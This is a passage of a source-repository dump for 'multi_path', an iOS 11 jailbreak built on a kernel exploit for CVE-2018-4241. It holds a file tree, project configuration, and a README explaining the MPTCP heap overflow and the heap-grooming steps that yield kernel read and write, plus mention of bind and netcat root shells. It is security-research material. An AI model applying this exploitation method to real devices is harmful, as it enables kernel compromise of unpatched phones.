├── README.md
├── multi_path.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ ├── contents.xcworkspacedata
│ ├── xcshareddata
│ │ └── IDEWorkspaceChecks.plist
│ └── xcuserdata
│ │ ├── ianbeer.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
│ │ └── jakejames.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
└── xcuserdata
│ ├── ianbeer.xcuserdatad
│ └── xcschemes
│ │ └── xcschememanagement.plist
│ └── jakejames.xcuserdatad
│ ├── xcdebugger
│ └── Breakpoints_v2.xcbkptlist
│ └── xcschemes
│ └── xcschememanagement.plist
└── multi_path
├── AppDelegate.h
├── AppDelegate.m
├── Assets.xcassets
└── AppIcon.appiconset
│ └── Contents.json
├── Base.lproj
├── LaunchScreen.storyboard
└── Main.storyboard
├── Info.plist
├── README
├── ViewController.h
├── ViewController.m
├── amfid_payload.dylib
├── dylibs
├── amfid_payload.dylib
└── dummypass.dylib
├── inject_criticald
├── AppSupport.tbd
├── Ent.plist
├── Makefile
├── bin
│ └── inject_criticald
├── include
│ └── AppSupport
│ │ ├── CPBitmapStore.h
│ │ └── CPDistributedMessagingCenter.h
└── inject_criticald.m
├── iosbinpack64
├── LaunchDaemons
│ ├── jailbreakd.plist
│ └── testbin.plist
├── bin
│ ├── amfidebilitate
│ ├── bash
│ ├── cat
│ ├── chmod
│ ├── cp
│ ├── date
│ ├── dd
│ ├── hostname
│ ├── jailbreakd
│ ├── jbclient
│ ├── kill
│ ├── launchctl
│ ├── launchctl_
│ ├── ln
│ ├── ls
│ ├── mkdir
│ ├── mv
│ ├── pwd
│ ├── rm
│ ├── rmdir
│ ├── rootme
│ ├── sh
│ ├── sleep
│ ├── stty
│ ├── sync
│ └── zsh
├── default.ent
├── dropbear.plist
├── etc
│ ├── alternatives
│ │ └── README
│ ├── apt
│ │ ├── sources.list.d
│ │ │ └── saurik.list
│ │ └── trusted.gpg.d
│ │ │ ├── bigboss.gpg
│ │ │ ├── modmyi.gpg
│ │ │ ├── saurik.gpg
│ │ │ └── zodttd.gpg
│ ├── motd
│ ├── profile
│ └── zshrc
├── makeMeAtHome.sh
├── profile
├── removeMe.sh
├── sbin
│ ├── dmesg
│ ├── ifconfig
│ ├── kextunload
│ ├── md5
│ ├── mknod
│ ├── ping
│ ├── shutdown
│ └── umount
├── test
└── usr
│ ├── bin
│ ├── amfid_payload.dylib
│ ├── arch
│ ├── chflags
│ ├── clear
│ ├── cut
│ ├── du
│ ├── false
│ ├── find
│ ├── fs_usage
│ ├── grep
│ ├── gunzip
│ ├── gzip
│ ├── head
│ ├── hexdump
│ ├── hostinfo
│ ├── id
│ ├── inject_criticald
│ ├── killall
│ ├── less
│ ├── login
│ ├── lsmp
│ ├── more
│ ├── nano
│ ├── nohup
│ ├── passwd
│ ├── plconvert
│ ├── printf
│ ├── renice
│ ├── reset
│ ├── sc_usage
│ ├── scp
│ ├── screen
│ ├── script
│ ├── sed
│ ├── seq
│ ├── split
│ ├── sqlite3
│ ├── stat
│ ├── syslog
│ ├── tail
│ ├── tar
│ ├── tee
│ ├── time
│ ├── true
│ ├── tset
│ ├── uicache
│ ├── uname
│ ├── vim
│ ├── vm_stat
│ ├── w
│ ├── wc
│ ├── what
│ ├── which
│ ├── xargs
│ └── xxd
│ ├── local
│ ├── bin
│ │ ├── dbclient
│ │ ├── dropbear
│ │ ├── dropbear.orig
│ │ ├── dropbearconvert
│ │ ├── dropbearkey
│ │ ├── dropbearmulti
│ │ ├── filemon
│ │ ├── jlutil
│ │ ├── joker
│ │ ├── jtool
│ │ ├── procexp
│ │ ├── procexp.ent
│ │ ├── qilin.o
│ │ ├── shaihulud
│ │ ├── shaihulud.c
│ │ └── wget
│ ├── dropbear
│ ├── dropbear.orig
│ ├── dropbearconvert
│ ├── dropbearkey
│ └── lib
│ │ └── zsh
│ │ └── 5.0.8
│ │ └── zsh
│ │ ├── attr.so
│ │ ├── cap.so
│ │ ├── clone.so
│ │ ├── compctl.so
│ │ ├── complete.so
│ │ ├── complist.so
│ │ ├── computil.so
│ │ ├── curses.so
│ │ ├── datetime.so
│ │ ├── deltochar.so
│ │ ├── example.so
│ │ ├── files.so
│ │ ├── langinfo.so
│ │ ├── mapfile.so
│ │ ├── mathfunc.so
│ │ ├── newuser.so
│ │ ├── parameter.so
│ │ ├── regex.so
│ │ ├── socket.so
│ │ ├── stat.so
│ │ ├── system.so
│ │ ├── tcp.so
│ │ ├── termcap.so
│ │ ├── terminfo.so
│ │ ├── zftp.so
│ │ ├── zle.so
│ │ ├── zleparameter.so
│ │ ├── zprof.so
│ │ ├── zpty.so
│ │ ├── zselect.so
│ │ └── zutil.so
│ ├── sbin
│ ├── chown
│ ├── ioreg
│ ├── joreg
│ ├── kextstat
│ ├── ltop
│ ├── netstat
│ ├── sysctl
│ └── taskpolicy
│ └── share
│ └── terminfo
│ ├── 61
│ ├── ansi
│ ├── ansi+arrows
│ ├── ansi+csr
│ ├── ansi+cup
│ ├── ansi+enq
│ ├── ansi+erase
│ ├── ansi+idc
│ ├── ansi+idl
│ ├── ansi+idl1
│ ├── ansi+inittabs
│ ├── ansi+local
│ ├── ansi+local1
│ ├── ansi+pp
│ ├── ansi+rca
│ ├── ansi+rep
│ ├── ansi+sgr
│ ├── ansi+sgrbold
│ ├── ansi+sgrdim
│ ├── ansi+sgrso
│ ├── ansi+sgrul
│ ├── ansi+tabs
│ ├── ansi-color-2-emx
│ ├── ansi-color-3-emx
│ ├── ansi-emx
│ ├── ansi-generic
│ ├── ansi-m
│ ├── ansi-mini
│ ├── ansi-mono
│ ├── ansi-mr
│ ├── ansi-mtabs
│ ├── ansi-nt
│ ├── ansi.sys
│ ├── ansi.sys-old
│ ├── ansi.sysk
│ ├── ansi43m
│ ├── ansi77
│ ├── ansi80x25
│ ├── ansi80x25-mono
│ ├── ansi80x25-raw
│ ├── ansi80x30
│ ├── ansi80x30-mono
│ ├── ansi80x43
│ ├── ansi80x43-mono
│ ├── ansi80x50
│ ├── ansi80x50-mono
│ ├── ansi80x60
│ ├── ansi80x60-mono
│ ├── ansil
│ ├── ansil-mono
│ ├── ansis
│ ├── ansis-mono
│ ├── ansisysk
│ └── ansiw
│ ├── 73
│ ├── screen
│ ├── screen+fkeys
│ ├── screen-16color
│ ├── screen-16color-bce
│ ├── screen-16color-bce-s
│ ├── screen-16color-s
│ ├── screen-256color
│ ├── screen-256color-bce
│ ├── screen-256color-bce-s
│ ├── screen-256color-s
│ ├── screen-bce
│ ├── screen-s
│ ├── screen-w
│ ├── screen.linux
│ ├── screen.mlterm
│ ├── screen.rxvt
│ ├── screen.teraterm
│ ├── screen.xterm-new
│ ├── screen.xterm-r6
│ ├── screen.xterm-xfree86
│ ├── screen2
│ └── screen3
│ ├── 76
│ ├── vt100
│ ├── vt100+
│ ├── vt100+enq
│ ├── vt100+fnkeys
│ ├── vt100+keypad
│ ├── vt100+pfkeys
│ ├── vt100-am
│ ├── vt100-bm
│ ├── vt100-bm-o
│ ├── vt100-bot-s
│ ├── vt100-nam
│ ├── vt100-nam-w
│ ├── vt100-nav
│ ├── vt100-nav-w
│ ├── vt100-putty
│ ├── vt100-s
│ ├── vt100-s-bot
│ ├── vt100-s-top
│ ├── vt100-top-s
│ ├── vt100-vb
│ ├── vt100-w
│ ├── vt100-w-am
│ ├── vt100-w-nam
│ ├── vt100-w-nav
│ └── vt100nam
│ ├── 78
│ └── xterm-256color
│ └── 6c
│ ├── linux
│ ├── linux-basic
│ ├── linux-c
│ ├── linux-c-nc
│ ├── linux-koi8
│ ├── linux-koi8r
│ ├── linux-lat
│ ├── linux-m
│ ├── linux-nic
│ ├── linux-vt
│ └── linux2.6.26
├── jailbreakd
├── Makefile
├── README.md
├── ent.xml
├── jailbreakd
├── jelbrek.h
├── jelbrek.m
├── kern_utils.c
├── kern_utils.h
├── kexecute.h
├── kexecute.m
├── main.m
├── make.sh
├── offsetof.c
├── offsetof.h
├── offsets.h
├── offsets.m
├── osobject.c
├── osobject.h
├── patchfinder64.h
└── patchfinder64.m
├── jelbrek
├── IOKit.tbd
├── QiLin.h
├── include
│ └── IOKit
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.c
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ ├── OSMessageNotification.h
│ │ ├── Readme.md
│ │ └── screenshot.jpg
├── inject_criticald.h
├── inject_criticald.m
├── jelbrek.h
├── jelbrek.m
├── kern_utils.h
├── kern_utils.m
├── kexecute.c
├── kexecute.h
├── libjb.h
├── libjb.m
├── offsetof.c
├── offsetof.h
├── osobject.c
├── osobject.h
├── patchfinder64.h
├── patchfinder64.m
├── qilin.o
├── remap_tfp_set_hsp.c
├── remap_tfp_set_hsp.h
├── shell.c
├── shell.h
├── unlocknvram.c
└── unlocknvram.h
├── kmem.h
├── launchctl
├── AppSupport.tbd
├── Ent.plist
├── Makefile
├── include
│ └── AppSupport
│ │ ├── CPBitmapStore.h
│ │ └── CPDistributedMessagingCenter.h
└── main.m
├── main.m
├── multi_path.entitlements
├── offsets.h
├── offsets.m
├── sploit.c
├── sploit.h
└── test
/README.md:
--------------------------------------------------------------------------------
1 | # multi_path
2 |
3 | Latest update includes:
4 | - working "clear" command
5 | - working "entitle" command for jailbreakd
6 | - working launchctl (no need to platformize manually! The real launchctl binary is moved and on its place another binary uses jailbreakd to launch it platformized)
7 | - working "inject_criticald" binary (uses jailbreakd!)
8 |
9 | iOS 11.0-11.3.1 jailbreak. Gets root, escapes sandbox, patches codesign (userland only), bind shell, nvram unlock (from Electra), host_get_special_port 4 (from Electra), code injection (from Electra; injects its amfid patch after using QiLin's since it's way better), SSH (dropbear), a small jailbreakd (inlcudes an example called "rootme", run it and if you get "uid: 0" it worked; check the README on the jailbreakd directory for more info :D)
10 |
11 | I think at this point this can be called a jailbreak, a developer-only one but with a small little feature: everything is done inside the app's bundle (except /var/dropbear, /var/profile & /var/motd) and nothing outside is touched. This makes it safe to use, without the requirement of full root read and write (although it is enabled on 11.0-11.2.6) and at the same time makes it not conflict with other jailbreaks in any way.
12 |
13 | Includes TWO root shells :)
14 |
15 | First is via dropbear (aka SSH) and the other via netcat if dropbear for some reason doesn't work or you prefer it?. You can drop any binaries in the iosbinpack64 directory. All binaries must have at least these two entitlements:
16 |
17 |
18 |
19 |
20 | platform-application
21 |
22 | com.apple.private.security.container-required
23 |
24 |
25 |
26 |
27 | LaunchDaemons are also supported, you can drop their plists in the iosbinpack64/LaunchDaemons directory and they'll get loaded on each run of the app. Type REPLACE_ME when you want to put the absolute path of iosbinpack64, like in the example provided.
28 |
29 | Future plans include: getting rid of QiLin and implementing everything i need open-source, (already made progress!), fix remounting for 11.3.x (I guess I have no other choice rather than wait for QiLin/LiberiOS/Electra)
30 |
31 | Credits to: Ian Beer for multi_path and mach_portal, Jonathan Levin for amfid patch, Jonathan Seals for find_kernel_base, Electra Team (especially stek29) and PsychoTea (@iBSparkes)
32 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | multi_path.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
8 |
20 |
21 |
22 |
24 |
36 |
37 |
38 |
40 |
52 |
53 |
54 |
56 |
68 |
69 |
70 |
72 |
84 |
85 |
86 |
88 |
100 |
101 |
102 |
104 |
116 |
117 |
118 |
120 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------
/multi_path.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | multi_path.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/multi_path/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 |
15 |
16 | @end
17 |
18 |
--------------------------------------------------------------------------------
/multi_path/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import "AppDelegate.h"
10 |
11 | @interface AppDelegate ()
12 |
13 | @end
14 |
15 | @implementation AppDelegate
16 |
17 |
18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
19 | // Override point for customization after application launch.
20 | return YES;
21 | }
22 |
23 |
24 | - (void)applicationWillResignActive:(UIApplication *)application {
25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
27 | }
28 |
29 |
30 | - (void)applicationDidEnterBackground:(UIApplication *)application {
31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
33 | }
34 |
35 |
36 | - (void)applicationWillEnterForeground:(UIApplication *)application {
37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
38 | }
39 |
40 |
41 | - (void)applicationDidBecomeActive:(UIApplication *)application {
42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
43 | }
44 |
45 |
46 | - (void)applicationWillTerminate:(UIApplication *)application {
47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
48 | }
49 |
50 |
51 | @end
52 |
--------------------------------------------------------------------------------
/multi_path/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | }
88 | ],
89 | "info" : {
90 | "version" : 1,
91 | "author" : "xcode"
92 | }
93 | }
--------------------------------------------------------------------------------
/multi_path/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/multi_path/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/multi_path/README:
--------------------------------------------------------------------------------
1 | multi_path - exploit for p0 issue 1558 (CVE-2018-4241)
2 | @i41nbeer
3 |
4 | mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family.
5 |
6 | The logic of this function fails to correctly handle source and destination sockaddrs which aren't
7 | AF_INET or AF_INET6:
8 |
9 | //***************
10 | // verify sa_len for AF_INET:
11 |
12 | if (dst->sa_family == AF_INET &&
13 | dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
14 | mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
15 | error = EINVAL;
16 | goto out;
17 | }
18 |
19 | // verify sa_len for AF_INET6:
20 |
21 | if (dst->sa_family == AF_INET6 &&
22 | dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
23 | mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
24 | error = EINVAL;
25 | goto out;
26 | }
27 |
28 | // code doesn't bail if sa_family was neither AF_INET nor AF_INET6
29 |
30 | if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
31 | if (mptcp_entitlement_check(mp_so) < 0) {
32 | error = EPERM;
33 | goto out;
34 | }
35 |
36 | mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
37 | }
38 |
39 | // memcpy with sa_len up to 255:
40 |
41 | if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
42 | memcpy(&mpte->mpte_dst, dst, dst->sa_len);
43 | }
44 |
45 | //***************
46 |
47 | Looking around in the structure which you overflow inside you notice you can hit both fields here:
48 |
49 | if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE)
50 | _FREE(mpte->mpte_itfinfo, M_TEMP);
51 |
52 | mpte_itfinfo_size is just before mpte_itfinfo.
53 |
54 | When the structure is initialized the mpte_itfinfo pointer points to a small inline array. If more subflows are added
55 | than will fit in there they are instead put in a heap buffer, and mpte_itfinfo will point to that.
56 |
57 | If you had another bug (eg the kernel heap disclosure bug from async_wake) you could overwrite the mpte_itfinfo field
58 | with any valid zone object and it would get free'd (in fact, you could also overwrite it with an offset into that object
59 | for even more fun!)
60 |
61 | However, we don't have that.
62 |
63 | Instead another approach is to partially overwrite the pointer. If we partially overwrite it with NULL bytes we can point
64 | it to a 256 byte, 65k, 16MB or 4GB aligned value.
65 |
66 | In this exploit I choose a 3 byte NULL overwrite, which will cause a kfree of the mpte_itfinfo address rounded down to the
67 | next 16MB boundary.
68 |
69 | The exploitation flow is as follows:
70 |
71 | Allocate alternatingly 16MB of ipc_kmsgs followed by a bunch of mptcp sockets. The goal here is to get a kalloc.2048 allocation
72 | at that 16MB boundary.
73 |
74 | Use the bug to free one of the ipc_kmsgs, moving that page to the intermediate list and putting the 16MB-aligned allocation on a
75 | kalloc.2048 intermediate page freelist.
76 |
77 | Allocate a bunch of filled 2047 byte pipes; the backing buffers for these pipes will come from kalloc.2048, hopefully including our
78 | 16MB-aligned address.
79 |
80 | Trigger the bug a second time, freeing the same address and this time then allocate a bunch of preallocated ipc_kmsg buffers from
81 | kalloc.2048.
82 |
83 | Now we hopefully have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write)
84 | overlapping each other.
85 |
86 | I use the thread exception port trick from extra_recipe to get messages sent to the prealloced ipc_kmsg buffer. Each time we check each
87 | of the pipes to see if any of them contain the message. When we find the right (ipc_kmsg,pipe) pair we can rewrite the message to send ourselves
88 | a fake port which lives inside the pipe buffer. I structure that fake port like the one from async_wake (which I based on yalu 10.2 by
89 | @qwertyoruiopz and @marcograss) to give me an early kernel read primitive.
90 |
91 | Using the kernel read primitive I find the kernel task and make a fake port which allows easier kernel memory read/write via
92 | mach_vm_read/mach_vm_write.
93 |
94 | Caveat: To connect mptcp sockets you do need the com.apple.developer.networking.multipath entitlement which requires an apple developer cert, which
95 | anyone can buy from Apple.
96 |
97 | Reliability:
98 | This is a security reseach tool and is faaaar from perfect. However, it should work most of the time, and when it does work it should
99 | do a good job of cleaning up so it won't panic later.
100 |
101 | To improve the probability of it working:
102 | * turn off wifi and go in to airplane mode
103 | * reboot
104 | * wait 30 seconds after restarting
105 | * run the app from xcode
106 |
107 | Supported devices:
108 | It should work on iOS 11.0 - 11.3.1 inclusive. I have tested on: iPod Touch 6g, iPhone 6s, iPhone SE, iPhone 7, iPhone 8
109 |
110 | API:
111 | #include "sploit.h" and call go() to run the exploit.
112 | If it worked you can use the functions in kmem.h to read and write kernel memory
113 |
114 | Notes:
115 | Multiple people have publically bindiff'ed this bug from the patch (or their 0day got patched ;) read their stuff for more details:
116 | @elvanderb gave a lightning talk about the bug at rump.beer in Paris on May 31st: https://www.rump.beer/2018/slides/ios_48h.pdf
117 | @jaakerblom published a working exploit on github on June 1st: https://github.com/potmdehex/multipath_kfree
118 | John's technique is similar to mine but he does a two-byte overflow rather than a three byte one, and replaces with different objects. good stuff!
119 |
--------------------------------------------------------------------------------
/multi_path/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface ViewController : UIViewController
12 |
13 | @property (weak, nonatomic) IBOutlet UITextView *logs;
14 |
15 | @end
16 |
17 |
--------------------------------------------------------------------------------
/multi_path/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/amfid_payload.dylib
--------------------------------------------------------------------------------
/multi_path/dylibs/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/dylibs/amfid_payload.dylib
--------------------------------------------------------------------------------
/multi_path/dylibs/dummypass.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/dylibs/dummypass.dylib
--------------------------------------------------------------------------------
/multi_path/inject_criticald/Ent.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | platform-application
6 |
7 | get-task-allow
8 |
9 | com.apple.system-task-ports
10 |
11 | task_for_pid-allow
12 |
13 | com.apple.private.security.container-required
14 |
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/multi_path/inject_criticald/Makefile:
--------------------------------------------------------------------------------
1 | TARGET = inject_criticald
2 | OUTDIR ?= bin
3 |
4 | CC = xcrun -sdk iphoneos cc -arch arm64
5 | # it is injected into trust cache by code
6 | # which only supports sha-256 signatures
7 | LDID = ldid2
8 | CFLAGS = -Wall -Iinclude
9 |
10 | .PHONY: all clean
11 |
12 | DEBUG ?= 0
13 | ifeq ($(DEBUG), 1)
14 | CFLAGS += -DINJECT_CRITICALD_DEBUG
15 | else
16 | CFLAGS += -O2
17 | endif
18 |
19 | all: $(OUTDIR)/$(TARGET)
20 |
21 | $(OUTDIR):
22 | mkdir -p $(OUTDIR)
23 |
24 | $(OUTDIR)/$(TARGET): *.m | $(OUTDIR)
25 | $(CC) -o $@ $^ -framework Foundation -framework IOKit $(CFLAGS) AppSupport.tbd
26 | $(LDID) -SEnt.plist $@
27 |
28 | clean:
29 | rm -f $(OUTDIR)/$(TARGET)
30 |
--------------------------------------------------------------------------------
/multi_path/inject_criticald/bin/inject_criticald:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/inject_criticald/bin/inject_criticald
--------------------------------------------------------------------------------
/multi_path/inject_criticald/include/AppSupport/CPBitmapStore.h:
--------------------------------------------------------------------------------
1 | @interface CPBitmapStore : NSObject
2 |
3 | - (void)purge;
4 |
5 | @end
6 |
--------------------------------------------------------------------------------
/multi_path/inject_criticald/include/AppSupport/CPDistributedMessagingCenter.h:
--------------------------------------------------------------------------------
1 | @interface CPDistributedMessagingCenter : NSObject
2 |
3 | + (instancetype)centerNamed:(NSString *)name;
4 |
5 | - (void)runServer;
6 | - (void)runServerOnCurrentThread;
7 | - (void)stopServer;
8 |
9 | - (void)registerForMessageName:(NSString *)messageName target:(id)target selector:(SEL)selector;
10 |
11 | - (BOOL)sendMessageName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
12 |
13 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
14 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo error:(NSError **)error;
15 |
16 | @end
17 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/LaunchDaemons/jailbreakd.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | jailbreakd
7 | Program
8 | REPLACE_ME/bin/jailbreakd
9 | EnvironmentVariables
10 |
11 | KernelBase
12 | 0x746f6d6f68696d61
13 |
14 | UserName
15 | root
16 | RunAtLoad
17 |
18 | KeepAlive
19 |
20 | StandardErrorPath
21 | /var/log/jailbreakd-stderr.log
22 | StandardOutPath
23 | /var/log/jailbreakd-stdout.log
24 |
25 |
26 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/LaunchDaemons/testbin.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Label
6 | testbinary
7 | Program
8 | REPLACE_ME/../test
9 | ProgramArguments
10 |
11 | REPLACE_ME/../test
12 |
13 | RunAtLoad
14 |
15 | KeepAlive
16 |
17 | StandardOutPath
18 | /var/log/testbin.log
19 |
20 |
21 |
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/amfidebilitate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/amfidebilitate
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/bash:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/bash
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/cat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/cat
--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/chmod:
